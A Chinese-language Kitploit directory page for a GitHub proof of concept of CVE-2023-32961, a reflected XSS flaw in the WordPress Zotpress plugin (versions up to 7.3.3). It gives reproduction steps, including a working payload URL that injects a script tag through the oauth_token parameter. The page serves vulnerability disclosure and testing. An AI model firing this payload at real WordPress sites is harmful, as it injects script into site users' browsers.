Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-32961 — CVE-2023-32961 的 PoC | Kitploit
工具/GitHubGitHub/lourc0d3/cve-2023-32961
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHublourc0d3/cve-2023-32961

CVE-2023-32961

CVE-2023-32961 的 PoC

查看仓库
2113年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-32961

该仓库涉及 WordPress Zotpress 插件中的 XSS 漏洞。

组件详情


组件名称

Zotpress

受影响版本

≤ 7.3.3

组件标识

zotpress

组件链接

https://wordpress.org/plugins/zotpress/

前置条件


无需身份验证

漏洞详情


简要描述

位于 zotpress/lib/admin/admin.accounts.oauth.php 中的 get_request_token 函数存在 XSS 攻击漏洞。

复现方法(PoC)

  1. 安装 oauth php 扩展以触发漏洞(此为 Zotpress 的可选步骤)。
  2. 登录 zotero.org。
  3. 必须满足 get_request_token 函数执行的条件(仅首次)。 发送如下载荷:http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1
  4. 发送以下载荷: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>

附加信息

  • 你需要一个 zotero.org 账户。

  • 你需要将 oauthState 值设置为 1 才能触发。如果上述载荷无效,则需要找到将 oauthState 设置为 1 的方法。

    • 条件表达式:

      root@kitploit:~
      $_GET['oauth_token'] != $state['request_token_info']['oauth_token']
      
  • 快速安装 php oauth 扩展:

    • 一行命令:

      root@kitploit:~
      sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo extension=oauth.so > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
      
  • 已在 wordpress:latest Docker 镜像中进行测试。

PoC 视频

https://www.youtube.com/watch?v=5kZ7bNbs_-Q

参考来源


CVE-2023-32961

下载工具